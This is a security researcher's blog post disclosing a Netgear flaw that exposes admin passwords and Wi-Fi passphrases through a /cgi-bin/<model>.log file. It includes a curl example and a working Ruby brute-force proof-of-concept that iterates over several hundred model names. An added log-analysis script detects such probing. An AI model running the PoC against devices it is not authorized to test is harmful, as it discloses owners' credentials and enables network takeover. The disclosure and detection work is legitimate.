Adam Caudill

Security Leader, Researcher, Developer, Writer, & Photographer

Netgear Admin Password Disclosure

Some (though not all) Netgear products expose the administrator password to unauthorized users in a file named /cgi-bin/<model>.log – if the device is vulnerable, you’ll get something like this:

>curl http://<ip>/cgi-bin/WNR2000XT.log
Admin login name        admin
Admin password  <snip>
Country Europe
Wireless network name (SSID)    wireless_ext
Wireless channel        6
Security type   WPA2-PSK(AES)
Wireless passphrase     <snip>

The full list of devices that are vulnerable isn’t known; the issue was presented to Netgear, but no response was received. To help identify the vulnerable devices, I pulled a list of all Netgear devices and wrote this script:

#!/usr/bin/env ruby

# Netgear Admin Info Log File Bruteforce PoC
# Copyright 2012 Adam Caudill <adam@adamcaudill.com>
#
# Usage: ruby netgear_adminpass_bt.rb <target-ip>

require 'socket'

PRODUCTS =
["AF711F", "AFM735", "AFT200", "AG711F", "AG711T", "AGM721F", "AGM721T",
"AGM722F", "AGM731F", "AGM732F", "AGM733", "AGM734", "ANT224D10", "ANT2405v1",
"ANT2405v2", "ANT2407", "ANT2409", "ANT2409v1", "ANT2409v2", "ANT24BDC",
"ANT24BNA", "ANT24D18", "ANT24O5", "ANT32405", "APS135W", "APS300W",
"APS525W", "AX741", "AX742", "AX743", "AX744", "AXC761", "AXM751", "AXM752",
"AXM761", "AXM762", "AXM763", "CARP1000", "CG3000", "CG3300D", "CG814M",
"CG814WG", "CGD24G", "CM212", "CMD31T", "CT5B1", "CT5B2", "CT5B6", "CT5W2",
"CT6B1", "CT6B2", "CT6B6", "CVG824G", "DG632", "DG632B", "DG632NA", "DG814",
"DG824M", "DG834B", "DG834Bv2", "DG834Bv3", "DG834Bv4", "DG834GB", "DG834GBv2",
"DG834GNA", "DG834GT", "DG834GUv5", "DG834Gv1", "DG834Gv2", "DG834Gv3",
"DG834Gv4", "DG834Gv5", "DG834GVv1", "DG834GVv2", "DG834Nv1", "DG834Nv2",
"DG834PN", "DG834v1", "DG834v2", "DG834v3", "DG834v4", "DGFV338", "DGN1000",
"DGN2000", "DGN2200", "DGN2200Bv3", "DGN2200M", "DGN2200MB", "DGN2200v1",
"DGN2200v3", "DGN3500", "DGND3300", "DGND3300v1", "DGND3300v2", "DGND3700",
"DGND3700v1", "DGND3700v2", "DGND3800B", "DM111P", "DM111PSPv1", "DM111PSPv2",
"DM111Pv1", "DM111Pv2", "DM602", "DS104", "DS106", "DS108", "DS116", "DS309",
"DS508", "DS516", "DS524", "EA101", "EA201", "EDA4000", "EN104", "EN104TP",
"EN104TPNA", "EN106TP", "EN108", "EN108TP", "EN116", "EN308", "EN308TC",
"EN516", "EN524", "EVA2000", "EVA2200", "EVA5000", "EVA700", "EVA8000",
"EVA9100", "EVA9150", "EVAW111", "FA101", "FA120", "FA310", "FA310TX",
"FA311v1", "FA311v2", "FA312", "FA410", "FA410TX", "FA411", "FA510", "FA511",
"FB105", "FE104", "FE108", "FE116", "FE508", "FE516", "FM114P", "FR114P",
"FR114W", "FR314", "FR318", "FR328S", "FREIGHT", "FS102", "FS104", "FS105",
"FS105NA", "FS105UK", "FS108", "FS108NA", "FS108P", "FS108PNA", "FS116",
"FS116E", "FS116NA", "FS116P", "FS116PNA", "FS205", "FS208", "FS262", "FS305",
"FS308", "FS309T", "FS508", "FS509", "FS509T", "FS510T", "FS516", "FS517TS",
"FS518", "FS518T", "FS524", "FS524S", "FS526T", "FS605NA", "FS605v1",
"FS605v2", "FS605v3", "FS608NA", "FS608v1", "FS608v2", "FS608v3", "FS726",
"FS726AT", "FS726T", "FS726TNA", "FS726TP", "FS726TPNA", "FS728TP",
"FS728TPv1", "FS728TPv2", "FS728TS", "FS750", "FS750AT", "FS750T", "FS750T2",
"FS750T2NA", "FS752TP", "FS752TPS", "FS752TS", "FSM7226RS", "FSM7250RS",
"FSM726", "FSM726E", "FSM726S", "FSM726v1", "FSM726v2", "FSM726v3", "FSM7326P",
"FSM7328PS", "FSM7328S", "FSM7352PS", "FSM7352S", "FSM750S", "FV318",
"FVG318NA", "FVG318v1", "FVG318v2", "FVL328", "FVM318", "FVS114", "FVS124G",
"FVS318G", "FVS318GE", "FVS318N", "FVS318NA", "FVS318v1", "FVS318v2",
"FVS318v3", "FVS328", "FVS336G", "FVS336Gv1", "FVS336Gv2", "FVS338",
"FVS338NA", "FVX538NA", "FVX538v1", "FVX538v2", "FWAG114", "FWG114Pv1",
"FWG114Pv2", "G7328SIP6", "G7352SIP6", "GA302T", "GA311", "GA311NA", "GA511",
"GA620", "GA621", "GA622T", "GC102", "GS104", "GS105", "GS105E", "GS105NA",
"GS108", "GS108E", "GS108Ev1", "GS108Ev2", "GS108NA", "GS108P", "GS108PE",
"GS108PEv1", "GS108PEv2", "GS108T", "GS108Tv1", "GS108Tv2", "GS110T",
"GS110TP", "GS116E", "GS116NA", "GS116v1", "GS116v2", "GS205", "GS208",
"GS308", "GS504", "GS504T", "GS508T", "GS510TP", "GS516T", "GS524T", "GS524TNA",
"GS605", "GS605av", "GS605AV", "GS605NA", "GS608", "GS608AV", "GS608NA",
"GS716T", "GS716TAV", "GS716Tv1", "GS716Tv2", "GS724AT", "GS724T", "GS724TAV",
"GS724TP", "GS724TPS", "GS724TR", "GS724TS", "GS724Tv1", "GS724Tv2", "GS724Tv3",
"GS728TPS", "GS728TS", "GS748AT", "GS748TNA", "GS748TP", "GS748TPS", "GS748TR",
"GS748TS", "GS748Tv1", "GS748Tv2", "GS748Tv3", "GS748Tv4", "GS752TPS",
"GS752TS", "GS752TXS", "GSM5212P", "GSM712", "GSM712F", "GSM7212", "GSM7212F",
"GSM7212P", "GSM7224", "GSM7224P", "GSM7224R", "GSM7224v1", "GSM7224v2",
"GSM7228PL", "GSM7228PS", "GSM7248", "GSM7248R", "GSM7248v1", "GSM7248v2",
"GSM7252PL", "GSM7252PS", "GSM7312", "GSM7324", "GSM7328FL", "GSM7328FS",
"GSM7328S", "GSM7328SO", "GSM7328Sv1", "GSM7328Sv2", "GSM7352S", "GSM7352SO",
"GSM7352Sv1", "GSM7352Sv2", "HA311", "HA501", "HDMG1", "HDMG3", "HDX101",
"HDX111", "HDXB111", "HE102", "HR314", "JDGN1000", "JFS516", "JFS516NA",
"JFS524", "JFS524E", "JFS524F", "JFS524NA", "JGS516", "JGS516NA", "JGS524",
"JGS524E", "JGS524F", "JGS524FNA", "JGS524NA", "JGS524v1", "JGS524v2",
"JGSM7224", "JNR1010", "JNR3000", "JNR3210", "JWNR2000Tv3", "JWNR2000v1",
"JWNR2000v2", "KWGR614", "MA101", "MA111v1", "MA111v2", "MA301", "MA311",
"MA401", "MA521", "MA701", "MBM621", "MBR1200", "MBR1210", "MBR1310",
"MBR624GU", "MBRN3000", "MCA1001v1", "MCA1001v2", "MCAB1001", "ME101", "ME102",
"ME103", "MP101", "MP101REM", "MP115", "MR314", "MR814v1", "MR814v2", "MR814v3",
"MS200", "MS2000", "MS2110", "MS2120", "MVBR1210C", "ND508", "ND520", "NMS100",
"NMS100NA", "NMS200", "NMS2100", "NMS215", "NMS230", "NMS250", "NMS2500",
"NTV200", "NTV200S", "NTV250", "NTV250DU", "NTV340", "NTV350", "NTV550",
"PA101", "PA301", "PE102", "PHS0111", "PHS0112", "PMB0311", "PMB0331NA",
"PMB0332NA", "PMB0333NA", "PMB0334NA", "POE101", "ProLine6100", "PRR0331NA",
"PRR0332", "PRR0333", "PRR0334", "PRR0334E", "PS101v1", "PS101v2", "PS104",
"PS105", "PS110", "PS111W", "PS113", "PS121v1", "PS121v2", "PTV1000", "PTV2000",
"PTVU1000", "R4500", "R6200", "R6300", "RD5200", "RD521210", "RD5D", "RH340",
"RH348", "RM356", "RN00RPL1", "RN00RPL2", "RN00RPL3", "RN12G", "RN12G0620",
"RN12G1220", "RN12P", "RN12P0610", "RN12P0620", "RN12P1210", "RN12P1220",
"RN12P2GE", "RN12PFAN", "RN12PPSU", "RN12PRAIL", "RN12PTRAY", "RN12S",
"RN12S0620", "RN12S1220", "RN12T", "RN12T0620", "RN12T0630", "RN12T1210",
"RN12T1220", "RN12T1230", "RN12T2CX4", "RN12T2SFP", "RND2000", "RND2000v1",
"RND2000v2", "RND2110", "RND2110v1", "RND2110v2", "RND2120", "RND2120v1",
"RND2150", "RND2150v1", "RND2175v1", "RND2210", "RND2210v1", "RND2210v2",
"RND2220", "RND2220v1", "RND4000", "RND4000v1", "RND4000v2", "RND4210",
"RND4210v1", "RND4210v2", "RND4220", "RND4250v1", "RND4410", "RND4410v1",
"RND4410v2", "RND4425v1", "RND4450v1", "RND4FAN1", "RND4M1GB1", "RND4PSU1",
"RND4TRAY1", "RNDP2000", "RNDP200U", "RNDP2210", "RNDP2210D", "RNDP2220",
"RNDP2220D", "RNDP2230", "RNDP2230D", "RNDP4000", "RNDP400U", "RNDP4410",
"RNDP4410D", "RNDP4420", "RNDP4420D", "RNDP4430", "RNDP4430D", "RNDP6000",
"RNDP6000NAS", "RNDP600E", "RNDP600U", "RNDP6310", "RNDP6350", "RNDP6610",
"RNDP6610D", "RNDP6620", "RNDP6620D", "RNDP6630", "RNDP6630D", "RNDTRAY",
"RNDU2000", "RNDU2120", "RNDU2220", "RNDU4000", "RNDU4220", "RNDU6000",
"RNDU6320", "RNDX4000", "RNDX400E", "RNDX4210", "RNDX4250", "RNDX4410",
"RNDX4420", "RNNVR01L", "RNNVR02L", "RNNVR04L", "RNR4000", "RNR4410", "RNR4425",
"RNR4450", "RNR4475", "RNR4FAN1", "RNR4PSU1", "RNR4RL26", "RNR4TRAY1",
"RNR4XCHG", "RNRP4000", "RNRP4410", "RNRP4420", "RNRP4430", "RNRPFAN1",
"RNRPPSU1", "RNRX4000", "RNRX400E", "RNRX4410", "RNRX4410D", "RNRX441E",
"RNRX4420", "RNRX4420D", "RNRX442E", "RNRX4430", "RNRX4430D", "RNRX443E",
"RNRX4450", "RNRXTRAY1", "RNRXXCHG", "RO318", "RP114", "RP334", "RP614NA",
"RP614v1", "RP614v2", "RP614v3", "RP614v4", "RPS5412", "RT311", "RT314",
"RT328", "RT338", "SC101", "SC101T", "SCC", "SPH101", "SPH200D", "SPH200W",
"SRX5308", "SRXN3205", "SSL312", "STM150", "STM150B", "STM150B3", "STM150E",
"STM150E3", "STM150EW", "STM150EW3", "STM150M", "STM150M3", "STM150W",
"STM150W3", "STM300", "STM300B", "STM300B3", "STM300E", "STM300E3", "STM300EW",
"STM300EW3", "STM300M", "STM300M3", "STM300W", "STM300W3", "STM600", "STM600B",
"STM600B3", "STM600E", "STM600E3", "STM600EW", "STM600EW3", "STM600M",
"STM600M3", "STM600W", "STM600W3", "TA612V", "USBG2", "USBG3", "USMG2", "UTM10",
"UTM100", "UTM100B", "UTM100B3", "UTM100E", "UTM100EW", "UTM100EW3", "UTM100M",
"UTM100M3", "UTM100W", "UTM100W3", "UTM10B", "UTM10B3", "UTM10E", "UTM10E3",
"UTM10EW", "UTM10EW3", "UTM10M", "UTM10M3", "UTM10W", "UTM10W3", "UTM150",
"UTM25", "UTM25B", "UTM25B3", "UTM25E", "UTM25E3", "UTM25EW", "UTM25EW3",
"UTM25M", "UTM25M3", "UTM25W", "UTM25W3", "UTM5", "UTM50", "UTM50B", "UTM50B3",
"UTM50E", "UTM50E3", "UTM50EW", "UTM50EW3", "UTM50M", "UTM50M3", "UTM50W",
"UTM50W3", "UTM5B", "UTM5B3", "UTM5E", "UTM5E3", "UTM5EW", "UTM5EW3", "UTM5M",
"UTM5M3", "UTM5W", "UTM5W3", "UTM9S", "VersaLink7500", "VPN01L", "VPN05L",
"VPNG01L", "VPNG05L", "WA301", "WAB102", "WAB501", "WAB502", "WAG102",
"WAG102NA", "WAG302v1", "WAG302v2", "WAG311", "WAG511", "WAG511NA", "WAGL102",
"WC7510L", "WC7520", "WC75NL", "WE102", "WFS709TP", "WG102", "WG102NA", "WG103",
"WG111NA", "WG111T", "WG111U", "WG111US", "WG111v1", "WG111v2", "WG111v3",
"WG121", "WG302NA", "WG302v1", "WG302v2", "WG311NA", "WG311T", "WG311v1",
"WG311v2", "WG311v3", "WG511T", "WG511U", "WG511v1", "WG511v2", "WG602BNA",
"WG602NA", "WG602v1", "WG602v2", "WG602v3", "WG602v4", "WGE101", "WGE101CN",
"WGE111", "WGL102", "WGM124", "WGM511", "WGPS606", "WGPS606NA", "WGR101",
"WGR612", "WGR614L", "WGR614NA", "WGR614v1", "WGR614v10", "WGR614v2",
"WGR614v3", "WGR614v4", "WGR614v5", "WGR614v6", "WGR614v7", "WGR614v8",
"WGR614v9", "WGR826V", "WGT624AU", "WGT624NA", "WGT624SC", "WGT624v1",
"WGT624v2", "WGT624v3", "WGT624v4", "WGT634U", "WGU624", "WGX102v1", "WGX102v2",
"WGXB102", "WIDI1000", "WMS105", "WMS5316", "WN1000RP", "WN111", "WN111v1",
"WN111v2", "WN121T", "WN2000RPT", "WN2000RPTv1", "WN2000RPTv2", "WN2500RP",
"WN3000RP", "WN311B", "WN311T", "WN511B", "WN511T", "WN604", "WN802T",
"WNA1000", "WNA1000M", "WNA1100", "WNA3100", "WNA3100M", "WNAP210", "WNAP320",
"WNB2100", "WNCE2001", "WNCE2004", "WNCE3001", "WNDA3100", "WNDA3100v1",
"WNDA3100v2", "WNDA4100", "WNDAP330", "WNDAP350", "WNDAP360", "WNDAP380R",
"WNDAP620", "WNDR3300", "WNDR3300v1", "WNDR3300v2", "WNDR3400", "WNDR3400v1",
"WNDR3400v2", "WNDR3600v3", "WNDR3700", "WNDR3700v1", "WNDR3700v2",
"WNDR3700v3", "WNDR37AV", "WNDR37AVv1", "WNDR37AVv2", "WNDR3800", "WNDR4000",
"WNDR4500", "WNDRMACv1", "WNDRMACv2", "WNHD3004", "WNHD3004v2", "WNHDE111",
"WNR1000", "WNR1000v1", "WNR1000v2", "WNR1000v3", "WNR1500", "WNR2000",
"WNR2000v1", "WNR2000v2", "WNR2000v3", "WNR2000XT", "WNR2200", "WNR3500",
"WNR3500L", "WNR3500Lv1", "WNR3500Lv2", "WNR3500v1", "WNR3500v2", "WNR500",
"WNR612", "WNR612v2", "WNR612v3", "WNR834Bv1", "WNR834Bv2", "WNR834M",
"WNR854T", "WNXR2000", "WNXR2100", "WPN111", "WPN111RV", "WPN311", "WPN511",
"WPN511RV", "WPN802v1", "WPN802v2", "WPN824EXT", "WPN824N", "WPN824v1",
"WPN824v2", "WPN824v3", "WPNT121", "WPNT511", "WPNT834", "XA601", "XAUB2511",
"XAV1004", "XAV101v1", "XAV101v2", "XAV1101", "XAV1201", "XAV1301v1",
"XAV1301v2", "XAV1501", "XAV1601", "XAV2001", "XAV2101v1", "XAV2101v2",
"XAV2501", "XAV2602", "XAV5001", "XAV5004", "XAV5101", "XAV5201", "XAV5501",
"XAV5601", "XAVB1001", "XAVB1004", "XAVB101", "XAVB1101", "XAVB1201",
"XAVB1301v1", "XAVB1301v2", "XAVB1401", "XAVB1501", "XAVB2001", "XAVB2101v1",
"XAVB2101v2", "XAVB2501", "XAVB2602", "XAVB2602v2", "XAVB5001", "XAVB5004",
"XAVB5101", "XAVB5201", "XAVB5501", "XAVB5601", "XAVB5602", "XAVN2001",
"XAVNB2001", "XAVT5601", "XCM8806", "XCM8810", "XE102v1", "XE102v2", "XE103",
"XE104", "XE104NA", "XE602", "XEB1004", "XEPS103", "XET1001", "XETB1001",
"XETB10GM", "XM128", "XSM7224L", "XSM7224S"]

PORT = 80
host = ARGV[0]

puts "Starting attack, this might take a while..."

begin
  result = nil
  puts "Connecting to #{host}:#{PORT}..."

  PRODUCTS.each_with_index do |product, index|
    puts "Sending request #{index}..." if index % 100 == 0
    sock = TCPSocket.open(host, PORT)
    sock.write("GET /cgi-bin/#{product}.log HTTP/1.1\r\nHost: #{host}\r\n\r\n")

    response = sock.recv(2048)
    sock.close

    if response.inspect.include? "Admin login name"
      result = response
      puts result
      break
    end
  end

  puts "No results found - product/version doesn't seem vulnerable" if result == nil
# Interrupt is a subclass of Exception, so it has to be rescued first
rescue ::Interrupt
  abort "\r\nExiting on interrupt"
rescue ::Exception => e
  puts e
  abort
end
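
The defender's view of the same traffic, as an added example that is not part of the original post: it reads access-log lines, groups requests for `/cgi-bin/<name>.log` by client, and separates clients that were actually served the settings file from those that only enumerated names. The combined log format (from a proxy or sensor in front of the device), the threshold, the function names and the sample lines are all assumptions made for this illustration.

```ruby
require 'set'

# Request shape produced by the enumeration script: GET /cgi-bin/<name>.log
# Assumes combined-log-format lines from a proxy or sensor in front of the device.
PROBE = %r{\A(\S+) \S+ \S+ \[[^\]]+\] "GET /cgi-bin/([A-Za-z0-9]+)\.log HTTP/[\d.]+" (\d\d\d) }

# Group probes by client: distinct names tried, and names answered with 200.
def collect_probes(lines)
  stats = Hash.new { |h, k| h[k] = { names: Set.new, hits: [] } }
  lines.each do |line|
    m = PROBE.match(line)
    next unless m
    ip, name, status = m.captures
    stats[ip][:names] << name
    stats[ip][:hits] << name if status == '200'
  end
  stats
end

# :exposed      - a settings file was actually served (rotate credentials)
# :enumeration  - many distinct model names tried, none served
# :single_probe - isolated request, none served
def classify(stats, threshold: 5)
  stats.transform_values do |s|
    if s[:hits].any? then :exposed
    elsif s[:names].size >= threshold then :enumeration
    else :single_probe
    end
  end
end

# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
  '192.0.2.10 - - [10/Oct/2012:13:55:36 +0000] "GET /cgi-bin/AF711F.log HTTP/1.1" 404 162',
  '192.0.2.10 - - [10/Oct/2012:13:55:36 +0000] "GET /cgi-bin/AFM735.log HTTP/1.1" 404 162',
  '192.0.2.10 - - [10/Oct/2012:13:55:37 +0000] "GET /cgi-bin/AFT200.log HTTP/1.1" 404 162',
  '192.0.2.10 - - [10/Oct/2012:13:55:37 +0000] "GET /cgi-bin/AG711F.log HTTP/1.1" 404 162',
  '192.0.2.10 - - [10/Oct/2012:13:55:38 +0000] "GET /cgi-bin/AG711T.log HTTP/1.1" 404 162',
  '198.51.100.7 - - [10/Oct/2012:14:02:11 +0000] "GET /cgi-bin/WNR2000XT.log HTTP/1.1" 200 231',
  '203.0.113.5 - - [10/Oct/2012:14:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
  '203.0.113.9 - - [10/Oct/2012:14:04:20 +0000] "GET /cgi-bin/WNR2000.log HTTP/1.1" 404 162'
].freeze

if __FILE__ == $PROGRAM_NAME
  classify(collect_probes(SAMPLE_LOG)).each { |ip, verdict| puts "#{ip}: #{verdict}" }
end
```

An `:exposed` verdict means the admin password and wireless passphrase shown in the output above should be treated as disclosed.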
